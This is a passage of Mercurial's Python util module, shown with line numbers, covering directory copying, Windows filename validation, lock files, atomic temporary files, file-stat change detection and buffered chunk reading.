1939 1941 oldstat.stat[stat.ST_MTIME] + 1
1940 1942 ) & 0x7FFFFFFF
1941 1943 os.utime(dest, (advanced, advanced))
1942 1944 except shutil.Error as inst:
1943 1945 raise error.Abort(stringutil.forcebytestr(inst))
1944 1946
1945 1947
1946 1948 def copyfiles(src, dst, hardlink=None, progress=None):
1947 1949 """Copy a directory tree using hardlinks if possible."""
1948 1950 num = 0
1949 1951
1950 1952 def settopic():
1951 1953 if progress:
1952 1954 progress.topic = _(b'linking') if hardlink else _(b'copying')
1953 1955
1954 1956 if os.path.isdir(src):
1955 1957 if hardlink is None:
1956 1958 hardlink = (
1957 1959 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1958 1960 )
1959 1961 settopic()
1960 1962 os.mkdir(dst)
1961 1963 for name, kind in listdir(src):
1962 1964 srcname = os.path.join(src, name)
1963 1965 dstname = os.path.join(dst, name)
1964 1966 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1965 1967 num += n
1966 1968 else:
1967 1969 if hardlink is None:
1968 1970 hardlink = (
1969 1971 os.stat(os.path.dirname(src)).st_dev
1970 1972 == os.stat(os.path.dirname(dst)).st_dev
1971 1973 )
1972 1974 settopic()
1973 1975
1974 1976 if hardlink:
1975 1977 try:
1976 1978 oslink(src, dst)
1977 1979 except (IOError, OSError):
1978 1980 hardlink = False
1979 1981 shutil.copy(src, dst)
1980 1982 else:
1981 1983 shutil.copy(src, dst)
1982 1984 num += 1
1983 1985 if progress:
1984 1986 progress.increment()
1985 1987
1986 1988 return hardlink, num
1987 1989
1988 1990
1989 1991 _winreservednames = {
1990 1992 b'con',
1991 1993 b'prn',
1992 1994 b'aux',
1993 1995 b'nul',
1994 1996 b'com1',
1995 1997 b'com2',
1996 1998 b'com3',
1997 1999 b'com4',
1998 2000 b'com5',
1999 2001 b'com6',
2000 2002 b'com7',
2001 2003 b'com8',
2002 2004 b'com9',
2003 2005 b'lpt1',
2004 2006 b'lpt2',
2005 2007 b'lpt3',
2006 2008 b'lpt4',
2007 2009 b'lpt5',
2008 2010 b'lpt6',
2009 2011 b'lpt7',
2010 2012 b'lpt8',
2011 2013 b'lpt9',
2012 2014 }
2013 2015 _winreservedchars = b':*?"<>|'
2014 2016
2015 2017
2016 2018 def checkwinfilename(path):
2017 2019 r'''Check that the base-relative path is a valid filename on Windows.
2018 2020 Returns None if the path is ok, or a UI string describing the problem.
2019 2021
2020 2022 >>> checkwinfilename(b"just/a/normal/path")
2021 2023 >>> checkwinfilename(b"foo/bar/con.xml")
2022 2024 "filename contains 'con', which is reserved on Windows"
2023 2025 >>> checkwinfilename(b"foo/con.xml/bar")
2024 2026 "filename contains 'con', which is reserved on Windows"
2025 2027 >>> checkwinfilename(b"foo/bar/xml.con")
2026 2028 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2027 2029 "filename contains 'AUX', which is reserved on Windows"
2028 2030 >>> checkwinfilename(b"foo/bar/bla:.txt")
2029 2031 "filename contains ':', which is reserved on Windows"
2030 2032 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2031 2033 "filename contains '\\x07', which is invalid on Windows"
2032 2034 >>> checkwinfilename(b"foo/bar/bla ")
2033 2035 "filename ends with ' ', which is not allowed on Windows"
2034 2036 >>> checkwinfilename(b"../bar")
2035 2037 >>> checkwinfilename(b"foo\\")
2036 2038 "filename ends with '\\', which is invalid on Windows"
2037 2039 >>> checkwinfilename(b"foo\\/bar")
2038 2040 "directory name ends with '\\', which is invalid on Windows"
2039 2041 '''
2040 2042 if path.endswith(b'\\'):
2041 2043 return _(b"filename ends with '\\', which is invalid on Windows")
2042 2044 if b'\\/' in path:
2043 2045 return _(b"directory name ends with '\\', which is invalid on Windows")
2044 2046 for n in path.replace(b'\\', b'/').split(b'/'):
2045 2047 if not n:
2046 2048 continue
2047 2049 for c in _filenamebytestr(n):
2048 2050 if c in _winreservedchars:
2049 2051 return (
2050 2052 _(
2051 2053 b"filename contains '%s', which is reserved "
2052 2054 b"on Windows"
2053 2055 )
2054 2056 % c
2055 2057 )
2056 2058 if ord(c) <= 31:
2057 2059 return _(
2058 2060 b"filename contains '%s', which is invalid on Windows"
2059 2061 ) % stringutil.escapestr(c)
2060 2062 base = n.split(b'.')[0]
2061 2063 if base and base.lower() in _winreservednames:
2062 2064 return (
2063 2065 _(b"filename contains '%s', which is reserved on Windows")
2064 2066 % base
2065 2067 )
2066 2068 t = n[-1:]
2067 2069 if t in b'. ' and n not in b'..':
2068 2070 return (
2069 2071 _(
2070 2072 b"filename ends with '%s', which is not allowed "
2071 2073 b"on Windows"
2072 2074 )
2073 2075 % t
2074 2076 )
2075 2077
2076 2078
2077 2079 timer = getattr(time, "perf_counter", None)
2078 2080
2079 2081 if pycompat.iswindows:
2080 2082 checkosfilename = checkwinfilename
2081 2083 if not timer:
2082 2084 timer = time.clock
2083 2085 else:
2084 2086 # mercurial.windows doesn't have platform.checkosfilename
2085 2087 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2086 2088 if not timer:
2087 2089 timer = time.time
2088 2090
2089 2091
2090 2092 def makelock(info, pathname):
2091 2093 """Create a lock file atomically if possible
2092 2094
2093 2095 This may leave a stale lock file if symlinks aren't supported and a
2094 2096 signal interrupt occurs.
2095 2097 """
2096 2098 try:
2097 2099 return os.symlink(info, pathname)
2098 2100 except OSError as why:
2099 2101 if why.errno == errno.EEXIST:
2100 2102 raise
2101 2103 except AttributeError: # no symlink in os
2102 2104 pass
2103 2105
2104 2106 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2105 2107 ld = os.open(pathname, flags)
2106 2108 os.write(ld, info)
2107 2109 os.close(ld)
2108 2110
2109 2111
2110 2112 def readlock(pathname):
2111 2113 try:
2112 2114 return readlink(pathname)
2113 2115 except OSError as why:
2114 2116 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2115 2117 raise
2116 2118 except AttributeError: # no symlink in os
2117 2119 pass
2118 2120 with posixfile(pathname, b'rb') as fp:
2119 2121 return fp.read()
2120 2122
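# Illustrative round trip (assumes a POSIX system with symlink support, so
# the lock data rides in the symlink target; the info string here is made
# up):
#
#     makelock(b'host:12345', b'.hg/store/lock')
#     readlock(b'.hg/store/lock')   ->  b'host:12345'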
2121 2123
2122 2124 def fstat(fp):
2123 2125 '''stat file object that may not have fileno method.'''
2124 2126 try:
2125 2127 return os.fstat(fp.fileno())
2126 2128 except AttributeError:
2127 2129 return os.stat(fp.name)
2128 2130
2129 2131
2130 2132 # File system features
2131 2133
2132 2134
2133 2135 def fscasesensitive(path):
2134 2136 """
2135 2137 Return true if the given path is on a case-sensitive filesystem
2136 2138
2137 2139 Requires a path (like /foo/.hg) ending with a foldable final
2138 2140 directory component.
2139 2141 """
2140 2142 s1 = os.lstat(path)
2141 2143 d, b = os.path.split(path)
2142 2144 b2 = b.upper()
2143 2145 if b == b2:
2144 2146 b2 = b.lower()
2145 2147 if b == b2:
2146 2148 return True # no evidence against case sensitivity
2147 2149 p2 = os.path.join(d, b2)
2148 2150 try:
2149 2151 s2 = os.lstat(p2)
2150 2152 if s2 == s1:
2151 2153 return False
2152 2154 return True
2153 2155 except OSError:
2154 2156 return True
2155 2157
2156 2158
2157 2159 try:
2158 2160 import re2 # pytype: disable=import-error
2159 2161
2160 2162 _re2 = None
2161 2163 except ImportError:
2162 2164 _re2 = False
2163 2165
2164 2166
2165 2167 class _re(object):
2166 2168 def _checkre2(self):
2167 2169 global _re2
2168 2170 try:
2169 2171 # check if match works, see issue3964
2170 2172 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2171 2173 except ImportError:
2172 2174 _re2 = False
2173 2175
2174 2176 def compile(self, pat, flags=0):
2175 2177 '''Compile a regular expression, using re2 if possible
2176 2178
2177 2179 For best performance, use only re2-compatible regexp features. The
2178 2180 only flags from the re module that are re2-compatible are
2179 2181 IGNORECASE and MULTILINE.'''
2180 2182 if _re2 is None:
2181 2183 self._checkre2()
2182 2184 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2183 2185 if flags & remod.IGNORECASE:
2184 2186 pat = b'(?i)' + pat
2185 2187 if flags & remod.MULTILINE:
2186 2188 pat = b'(?m)' + pat
2187 2189 try:
2188 2190 return re2.compile(pat)
2189 2191 except re2.error:
2190 2192 pass
2191 2193 return remod.compile(pat, flags)
2192 2194
2193 2195 @propertycache
2194 2196 def escape(self):
2195 2197 '''Return the version of escape corresponding to self.compile.
2196 2198
2197 2199 This is imperfect because whether re2 or re is used for a particular
2198 2200 function depends on the flags, etc, but it's the best we can do.
2199 2201 '''
2200 2202 global _re2
2201 2203 if _re2 is None:
2202 2204 self._checkre2()
2203 2205 if _re2:
2204 2206 return re2.escape
2205 2207 else:
2206 2208 return remod.escape
2207 2209
2208 2210
2209 2211 re = _re()
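# Example (illustrative): the module-level `re` instance transparently
# prefers re2 when available and falls back to the stdlib engine. Only
# IGNORECASE and MULTILINE survive the re2 path; any other flag (or an
# re2-incompatible pattern) forces stdlib re.
#
#     pat = re.compile(b'^[a-f0-9]{40}$', remod.IGNORECASE)
#     pat.match(b'A' * 40)   # matches under either engine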
2210 2212
2211 2213 _fspathcache = {}
2212 2214
2213 2215
2214 2216 def fspath(name, root):
2215 2217 '''Get name in the case stored in the filesystem
2216 2218
2217 2219 The name should be relative to root, and be normcase-ed for efficiency.
2218 2220
2219 2221 Note that this function is unnecessary for case-sensitive
2220 2222 filesystems, and should not be called there (simply because it's expensive).
2221 2223
2222 2224 The root should be normcase-ed, too.
2223 2225 '''
2224 2226
2225 2227 def _makefspathcacheentry(dir):
2226 2228 return {normcase(n): n for n in os.listdir(dir)}
2227 2229
2228 2230 seps = pycompat.ossep
2229 2231 if pycompat.osaltsep:
2230 2232 seps = seps + pycompat.osaltsep
2231 2233 # Protect backslashes. This gets silly very quickly.
2232 2234 seps = seps.replace(b'\\', b'\\\\')
2233 2235 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2234 2236 dir = os.path.normpath(root)
2235 2237 result = []
2236 2238 for part, sep in pattern.findall(name):
2237 2239 if sep:
2238 2240 result.append(sep)
2239 2241 continue
2240 2242
2241 2243 if dir not in _fspathcache:
2242 2244 _fspathcache[dir] = _makefspathcacheentry(dir)
2243 2245 contents = _fspathcache[dir]
2244 2246
2245 2247 found = contents.get(part)
2246 2248 if not found:
2247 2249 # retry "once per directory" per "dirstate.walk" which
2248 2250 # may take place for each patch of "hg qpush", for example
2249 2251 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2250 2252 found = contents.get(part)
2251 2253
2252 2254 result.append(found or part)
2253 2255 dir = os.path.join(dir, part)
2254 2256
2255 2257 return b''.join(result)
2256 2258
2257 2259
2258 2260 def checknlink(testfile):
2259 2261 '''check whether hardlink count reporting works properly'''
2260 2262
2261 2263 # testfile may be open, so we need a separate file for checking to
2262 2264 # work around issue2543 (or testfile may get lost on Samba shares)
2263 2265 f1, f2, fp = None, None, None
2264 2266 try:
2265 2267 fd, f1 = pycompat.mkstemp(
2266 2268 prefix=b'.%s-' % os.path.basename(testfile),
2267 2269 suffix=b'1~',
2268 2270 dir=os.path.dirname(testfile),
2269 2271 )
2270 2272 os.close(fd)
2271 2273 f2 = b'%s2~' % f1[:-2]
2272 2274
2273 2275 oslink(f1, f2)
2274 2276 # nlinks() may behave differently for files on Windows shares if
2275 2277 # the file is open.
2276 2278 fp = posixfile(f2)
2277 2279 return nlinks(f2) > 1
2278 2280 except OSError:
2279 2281 return False
2280 2282 finally:
2281 2283 if fp is not None:
2282 2284 fp.close()
2283 2285 for f in (f1, f2):
2284 2286 try:
2285 2287 if f is not None:
2286 2288 os.unlink(f)
2287 2289 except OSError:
2288 2290 pass
2289 2291
2290 2292
2291 2293 def endswithsep(path):
2292 2294 '''Check path ends with os.sep or os.altsep.'''
2293 2295 return (
2294 2296 path.endswith(pycompat.ossep)
2295 2297 or pycompat.osaltsep
2296 2298 and path.endswith(pycompat.osaltsep)
2297 2299 )
2298 2300
2299 2301
2300 2302 def splitpath(path):
2301 2303 '''Split path by os.sep.
2302 2304 Note that this function does not use os.altsep because this is
2303 2305 an alternative to a simple "xxx.split(os.sep)".
2304 2306 It is recommended to use os.path.normpath() before using this
2305 2307 function if needed.'''
2306 2308 return path.split(pycompat.ossep)
2307 2309
2308 2310
2309 2311 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2310 2312 """Create a temporary file with the same contents from name
2311 2313
2312 2314 The permission bits are copied from the original file.
2313 2315
2314 2316 If the temporary file is going to be truncated immediately, you
2315 2317 can use emptyok=True as an optimization.
2316 2318
2317 2319 Returns the name of the temporary file.
2318 2320 """
2319 2321 d, fn = os.path.split(name)
2320 2322 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2321 2323 os.close(fd)
2322 2324 # Temporary files are created with mode 0600, which is usually not
2323 2325 # what we want. If the original file already exists, just copy
2324 2326 # its mode. Otherwise, manually obey umask.
2325 2327 copymode(name, temp, createmode, enforcewritable)
2326 2328
2327 2329 if emptyok:
2328 2330 return temp
2329 2331 try:
2330 2332 try:
2331 2333 ifp = posixfile(name, b"rb")
2332 2334 except IOError as inst:
2333 2335 if inst.errno == errno.ENOENT:
2334 2336 return temp
2335 2337 if not getattr(inst, 'filename', None):
2336 2338 inst.filename = name
2337 2339 raise
2338 2340 ofp = posixfile(temp, b"wb")
2339 2341 for chunk in filechunkiter(ifp):
2340 2342 ofp.write(chunk)
2341 2343 ifp.close()
2342 2344 ofp.close()
2343 2345 except: # re-raises
2344 2346 try:
2345 2347 os.unlink(temp)
2346 2348 except OSError:
2347 2349 pass
2348 2350 raise
2349 2351 return temp
2350 2352
2351 2353
2352 2354 class filestat(object):
2353 2355 """help to exactly detect change of a file
2354 2356
2355 2357 The 'stat' attribute is the result of 'os.stat()' if the specified
2356 2358 'path' exists; otherwise it is None. This avoids a preparatory
2357 2359 'exists()' check on the client side of this class.
2358 2360 """
2359 2361
2360 2362 def __init__(self, stat):
2361 2363 self.stat = stat
2362 2364
2363 2365 @classmethod
2364 2366 def frompath(cls, path):
2365 2367 try:
2366 2368 stat = os.stat(path)
2367 2369 except OSError as err:
2368 2370 if err.errno != errno.ENOENT:
2369 2371 raise
2370 2372 stat = None
2371 2373 return cls(stat)
2372 2374
2373 2375 @classmethod
2374 2376 def fromfp(cls, fp):
2375 2377 stat = os.fstat(fp.fileno())
2376 2378 return cls(stat)
2377 2379
2378 2380 __hash__ = object.__hash__
2379 2381
2380 2382 def __eq__(self, old):
2381 2383 try:
2382 2384 # if ambiguity between stat of new and old file is
2383 2385 # avoided, comparison of size, ctime and mtime is enough
2384 2386 # to exactly detect change of a file regardless of platform
2385 2387 return (
2386 2388 self.stat.st_size == old.stat.st_size
2387 2389 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2388 2390 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2389 2391 )
2390 2392 except AttributeError:
2391 2393 pass
2392 2394 try:
2393 2395 return self.stat is None and old.stat is None
2394 2396 except AttributeError:
2395 2397 return False
2396 2398
2397 2399 def isambig(self, old):
2398 2400 """Examine whether new (= self) stat is ambiguous against old one
2399 2401
2400 2402 "S[N]" below means stat of a file at N-th change:
2401 2403
2402 2404 - S[n-1].ctime < S[n].ctime: can detect change of a file
2403 2405 - S[n-1].ctime == S[n].ctime
2404 2406 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2405 2407 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2406 2408 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2407 2409 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2408 2410
2409 2411 Case (*2) above means that a file was changed twice or more
2410 2412 within the same second (= S[n-1].ctime), so timestamp comparison
2411 2413 is ambiguous.
2412 2414
2413 2415 The basic idea to avoid such ambiguity is "advance mtime 1 sec, if
2414 2416 timestamp is ambiguous".
2415 2417
2416 2418 But advancing mtime only in case (*2) doesn't work as
2417 2419 expected, because naturally advanced S[n].mtime in case (*1)
2418 2420 might be equal to manually advanced S[n-1 or earlier].mtime.
2419 2421
2420 2422 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2421 2423 treated as ambiguous regardless of mtime, to avoid overlooking
2422 2424 a change due to a conflict between such mtimes.
2423 2425
2424 2426 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2425 2427 S[n].mtime", even if size of a file isn't changed.
2426 2428 """
2427 2429 try:
2428 2430 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2429 2431 except AttributeError:
2430 2432 return False
2431 2433
2432 2434 def avoidambig(self, path, old):
2433 2435 """Change file stat of specified path to avoid ambiguity
2434 2436
2435 2437 'old' should be previous filestat of 'path'.
2436 2438
2437 2439 This skips avoiding ambiguity if the process doesn't have
2438 2440 appropriate privileges for 'path'. This returns False in this
2439 2441 case.
2440 2442
2441 2443 Otherwise, this returns True, as "ambiguity is avoided".
2442 2444 """
2443 2445 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2444 2446 try:
2445 2447 os.utime(path, (advanced, advanced))
2446 2448 except OSError as inst:
2447 2449 if inst.errno == errno.EPERM:
2448 2450 # utime() on the file created by another user causes EPERM,
2449 2451 # if a process doesn't have appropriate privileges
2450 2452 return False
2451 2453 raise
2452 2454 return True
2453 2455
2454 2456 def __ne__(self, other):
2455 2457 return not self == other
2456 2458
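# Worked example (illustrative): two writes landing within the same ctime
# second are indistinguishable by (size, ctime, mtime) alone, hence
# isambig(); avoidambig() nudges mtime to old mtime + 1 (modulo 2**31) so
# the next comparison can tell the versions apart.
#
#     old = filestat.frompath(path)
#     rewrite(path)                     # hypothetical same-second change
#     new = filestat.frompath(path)
#     if new.isambig(old):
#         new.avoidambig(path, old)     # returns False on EPERM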
2457 2459
2458 2460 class atomictempfile(object):
2459 2461 '''writable file object that atomically updates a file
2460 2462
2461 2463 All writes will go to a temporary copy of the original file. Call
2462 2464 close() when you are done writing, and atomictempfile will rename
2463 2465 the temporary copy to the original name, making the changes
2464 2466 visible. If the object is destroyed without being closed, all your
2465 2467 writes are discarded.
2466 2468
2467 2469 checkambig argument of constructor is used with filestat, and is
2468 2470 useful only if target file is guarded by any lock (e.g. repo.lock
2469 2471 or repo.wlock).
2470 2472 '''
2471 2473
2472 2474 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2473 2475 self.__name = name # permanent name
2474 2476 self._tempname = mktempcopy(
2475 2477 name,
2476 2478 emptyok=(b'w' in mode),
2477 2479 createmode=createmode,
2478 2480 enforcewritable=(b'w' in mode),
2479 2481 )
2480 2482
2481 2483 self._fp = posixfile(self._tempname, mode)
2482 2484 self._checkambig = checkambig
2483 2485
2484 2486 # delegated methods
2485 2487 self.read = self._fp.read
2486 2488 self.write = self._fp.write
2487 2489 self.seek = self._fp.seek
2488 2490 self.tell = self._fp.tell
2489 2491 self.fileno = self._fp.fileno
2490 2492
2491 2493 def close(self):
2492 2494 if not self._fp.closed:
2493 2495 self._fp.close()
2494 2496 filename = localpath(self.__name)
2495 2497 oldstat = self._checkambig and filestat.frompath(filename)
2496 2498 if oldstat and oldstat.stat:
2497 2499 rename(self._tempname, filename)
2498 2500 newstat = filestat.frompath(filename)
2499 2501 if newstat.isambig(oldstat):
2500 2502 # stat of changed file is ambiguous to original one
2501 2503 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2502 2504 os.utime(filename, (advanced, advanced))
2503 2505 else:
2504 2506 rename(self._tempname, filename)
2505 2507
2506 2508 def discard(self):
2507 2509 if not self._fp.closed:
2508 2510 try:
2509 2511 os.unlink(self._tempname)
2510 2512 except OSError:
2511 2513 pass
2512 2514 self._fp.close()
2513 2515
2514 2516 def __del__(self):
2515 2517 if safehasattr(self, '_fp'): # constructor actually did something
2516 2518 self.discard()
2517 2519
2518 2520 def __enter__(self):
2519 2521 return self
2520 2522
2521 2523 def __exit__(self, exctype, excvalue, traceback):
2522 2524 if exctype is not None:
2523 2525 self.discard()
2524 2526 else:
2525 2527 self.close()
2526 2528
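# Typical usage (illustrative): writes go to a temporary copy and become
# visible only on a clean exit of the with-block; an exception discards
# them, leaving the original file untouched.
#
#     with atomictempfile(b'data.bin', b'wb') as fp:
#         fp.write(b'all or nothing')
#     # on success, data.bin now holds the new content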
2527 2529
2528 2530 def unlinkpath(f, ignoremissing=False, rmdir=True):
2529 2531 """unlink and remove the directory if it is empty"""
2530 2532 if ignoremissing:
2531 2533 tryunlink(f)
2532 2534 else:
2533 2535 unlink(f)
2534 2536 if rmdir:
2535 2537 # try removing directories that might now be empty
2536 2538 try:
2537 2539 removedirs(os.path.dirname(f))
2538 2540 except OSError:
2539 2541 pass
2540 2542
2541 2543
2542 2544 def tryunlink(f):
2543 2545 """Attempt to remove a file, ignoring ENOENT errors."""
2544 2546 try:
2545 2547 unlink(f)
2546 2548 except OSError as e:
2547 2549 if e.errno != errno.ENOENT:
2548 2550 raise
2549 2551
2550 2552
2551 2553 def makedirs(name, mode=None, notindexed=False):
2552 2554 """recursive directory creation with parent mode inheritance
2553 2555
2554 2556 Newly created directories are marked as "not to be indexed by
2555 2557 the content indexing service", if ``notindexed`` is specified
2556 2558 for "write" mode access.
2557 2559 """
2558 2560 try:
2559 2561 makedir(name, notindexed)
2560 2562 except OSError as err:
2561 2563 if err.errno == errno.EEXIST:
2562 2564 return
2563 2565 if err.errno != errno.ENOENT or not name:
2564 2566 raise
2565 2567 parent = os.path.dirname(os.path.abspath(name))
2566 2568 if parent == name:
2567 2569 raise
2568 2570 makedirs(parent, mode, notindexed)
2569 2571 try:
2570 2572 makedir(name, notindexed)
2571 2573 except OSError as err:
2572 2574 # Catch EEXIST to handle races
2573 2575 if err.errno == errno.EEXIST:
2574 2576 return
2575 2577 raise
2576 2578 if mode is not None:
2577 2579 os.chmod(name, mode)
2578 2580
2579 2581
2580 2582 def readfile(path):
2581 2583 with open(path, b'rb') as fp:
2582 2584 return fp.read()
2583 2585
2584 2586
2585 2587 def writefile(path, text):
2586 2588 with open(path, b'wb') as fp:
2587 2589 fp.write(text)
2588 2590
2589 2591
2590 2592 def appendfile(path, text):
2591 2593 with open(path, b'ab') as fp:
2592 2594 fp.write(text)
2593 2595
2594 2596
2595 2597 class chunkbuffer(object):
2596 2598 """Allow arbitrary sized chunks of data to be efficiently read from an
2597 2599 iterator over chunks of arbitrary size."""
2598 2600
2599 2601 def __init__(self, in_iter):
2600 2602 """in_iter is the iterator that's iterating over the input chunks."""
2601 2603
2602 2604 def splitbig(chunks):
2603 2605 for chunk in chunks:
2604 2606 if len(chunk) > 2 ** 20:
2605 2607 pos = 0
2606 2608 while pos < len(chunk):
2607 2609 end = pos + 2 ** 18
2608 2610 yield chunk[pos:end]
2609 2611 pos = end
2610 2612 else:
2611 2613 yield chunk
2612 2614
2613 2615 self.iter = splitbig(in_iter)
2614 2616 self._queue = collections.deque()
2615 2617 self._chunkoffset = 0
2616 2618
2617 2619 def read(self, l=None):
2618 2620 """Read L bytes of data from the iterator of chunks of data.
2619 2621 Returns less than L bytes if the iterator runs dry.
2620 2622
2621 2623 If the size parameter is omitted, read everything."""
2622 2624 if l is None:
2623 2625 return b''.join(self.iter)
2624 2626
2625 2627 left = l
2626 2628 buf = []
2627 2629 queue = self._queue
2628 2630 while left > 0:
2629 2631 # refill the queue
2630 2632 if not queue:
2631 2633 target = 2 ** 18
2632 2634 for chunk in self.iter:
2633 2635 queue.append(chunk)
2634 2636 target -= len(chunk)
2635 2637 if target <= 0:
2636 2638 break
2637 2639 if not queue:
2638 2640 break
2639 2641
2640 2642 # The easy way to do this would be to queue.popleft(), modify the
2641 2643 # chunk (if necessary), then queue.appendleft(). However, for cases
2642 2644 # where we read partial chunk content, this incurs 2 dequeue
2643 2645 # mutations and creates a new str for the remaining chunk in the
2644 2646 # queue. Our code below avoids this overhead.
2645 2647
2646 2648 chunk = queue[0]
2647 2649 chunkl = len(chunk)
2648 2650 offset = self._chunkoffset
2649 2651
2650 2652 # Use full chunk.
2651 2653 if offset == 0 and left >= chunkl:
2652 2654 left -= chunkl
2653 2655 queue.popleft()
2654 2656 buf.append(chunk)
2655 2657 # self._chunkoffset remains at 0.
2656 2658 continue
2657 2659
2658 2660 chunkremaining = chunkl - offset
2659 2661
2660 2662 # Use all of unconsumed part of chunk.
2661 2663 if left >= chunkremaining:
2662 2664 left -= chunkremaining
2663 2665 queue.popleft()
2664 2666 # offset == 0 is enabled by block above, so this won't merely
2665 2667 # copy via ``chunk[0:]``.
2666 2668 buf.append(chunk[offset:])
2667 2669 self._chunkoffset = 0
2668 2670
2669 2671 # Partial chunk needed.
2670 2672 else:
2671 2673 buf.append(chunk[offset : offset + left])
2672 2674 self._chunkoffset += left
2673 2675 left -= chunkremaining
2674 2676
2675 2677 return b''.join(buf)
2676 2678
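# Example (illustrative): chunkbuffer rechunks an arbitrary iterator so that
# callers can read exact byte counts regardless of how the source split the
# data.
#
#     buf = chunkbuffer(iter([b'abc', b'defgh']))
#     buf.read(4)   ->  b'abcd'
#     buf.read(4)   ->  b'efgh'
#     buf.read(4)   ->  b''      (source exhausted)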
2677 2679
2678 2680 def filechunkiter(f, size=131072, limit=None):
2679 2681 """Create a generator that produces the data in the file size
2680 2682 (default 131072) bytes at a time, up to optional limit (default is
2681 2683 to read all data). Chunks may be less than size bytes if the
2682 2684 chunk is the last chunk in the file, or the file is a socket or
2683 2685 some other type of file that sometimes reads less data than is
2684 2686 requested."""
2685 2687 assert size >= 0
2686 2688 assert limit is None or limit >= 0
2687 2689 while True:
2688 2690 if limit is None:
2689 2691 nbytes = size
2690 2692 else:
2691 2693 nbytes = min(limit, size)
2692 2694 s = nbytes and f.read(nbytes)
2693 2695 if not s:
2694 2696 break
2695 2697 if limit:
2696 2698 limit -= len(s)
2697 2699 yield s
2698 2700
2699 2701
2700 2702 class cappedreader(object):
2701 2703 """A file object proxy that allows reading up to N bytes.
2702 2704
2703 2705 Given a source file object, instances of this type allow reading up to
2704 2706 N bytes from that source file object. Attempts to read past the allowed
2705 2707 limit are treated as EOF.
2706 2708
2707 2709 It is assumed that I/O is not performed on the original file object
2708 2710 in addition to the I/O performed by this instance. If it is,
2709 2711 state tracking will get out of sync and unexpected results will ensue.
2710 2712 """
2711 2713
2712 2714 def __init__(self, fh, limit):
2713 2715 """Allow reading up to <limit> bytes from <fh>."""
2714 2716 self._fh = fh
2715 2717 self._left = limit
2716 2718
2717 2719 def read(self, n=-1):
2718 2720 if not self._left:
2719 2721 return b''
2720 2722
2721 2723 if n < 0:
2722 2724 n = self._left
2723 2725
2724 2726 data = self._fh.read(min(n, self._left))
2725 2727 self._left -= len(data)
2726 2728 assert self._left >= 0
2727 2729
2728 2730 return data
2729 2731
2730 2732 def readinto(self, b):
2731 2733 res = self.read(len(b))
2732 2734 if res is None:
2733 2735 return None
2734 2736
2735 2737 b[0 : len(res)] = res
2736 2738 return len(res)
2737 2739
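# Example (illustrative): cap reads at a frame boundary so a consumer cannot
# run past its frame into the next one. Assumes `import io` for the demo
# buffer.
#
#     fh = io.BytesIO(b'frame-one|frame-two')
#     reader = cappedreader(fh, 9)
#     reader.read()      ->  b'frame-one'
#     reader.read(100)   ->  b''     (limit reached; reads as EOF)
#     fh.read(1)         ->  b'|'    (underlying file resumes from there)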
2738 2740
2739 2741 def unitcountfn(*unittable):
2740 2742 '''return a function that renders a readable count of some quantity'''
2741 2743
2742 2744 def go(count):
2743 2745 for multiplier, divisor, format in unittable:
2744 2746 if abs(count) >= divisor * multiplier:
2745 2747 return format % (count / float(divisor))
2746 2748 return unittable[-1][2] % count
2747 2749
2748 2750 return go
2749 2751
2750 2752
2751 2753 def processlinerange(fromline, toline):
2752 2754 """Check that linerange <fromline>:<toline> makes sense and return a
2753 2755 0-based range.
2754 2756
2755 2757 >>> processlinerange(10, 20)
2756 2758 (9, 20)
2757 2759 >>> processlinerange(2, 1)
2758 2760 Traceback (most recent call last):
2759 2761 ...
2760 2762 ParseError: line range must be positive
2761 2763 >>> processlinerange(0, 5)
2762 2764 Traceback (most recent call last):
2763 2765 ...
2764 2766 ParseError: fromline must be strictly positive
2765 2767 """
2766 2768 if toline - fromline < 0:
2767 2769 raise error.ParseError(_(b"line range must be positive"))
2768 2770 if fromline < 1:
2769 2771 raise error.ParseError(_(b"fromline must be strictly positive"))
2770 2772 return fromline - 1, toline
2771 2773
2772 2774
2773 2775 bytecount = unitcountfn(
2774 2776 (100, 1 << 30, _(b'%.0f GB')),
2775 2777 (10, 1 << 30, _(b'%.1f GB')),
2776 2778 (1, 1 << 30, _(b'%.2f GB')),
2777 2779 (100, 1 << 20, _(b'%.0f MB')),
2778 2780 (10, 1 << 20, _(b'%.1f MB')),
2779 2781 (1, 1 << 20, _(b'%.2f MB')),
2780 2782 (100, 1 << 10, _(b'%.0f KB')),
2781 2783 (10, 1 << 10, _(b'%.1f KB')),
2782 2784 (1, 1 << 10, _(b'%.2f KB')),
2783 2785 (1, 1, _(b'%.0f bytes')),
2784 2786 )
2785 2787
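# Examples (illustrative) for the generated renderer: the table is scanned
# top-down, and the first row whose threshold (multiplier * divisor) fits
# decides both the unit and the precision.
#
#     bytecount(100 << 30)         ->  b'100 GB'     (%.0f GB row)
#     bytecount(int(1.5 * 2**20))  ->  b'1.50 MB'    (%.2f MB row)
#     bytecount(512)               ->  b'512 bytes'  (final fallback row)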
2786 2788
2787 2789 class transformingwriter(object):
2788 2790 """Writable file wrapper to transform data by function"""
2789 2791
2790 2792 def __init__(self, fp, encode):
2791 2793 self._fp = fp
2792 2794 self._encode = encode
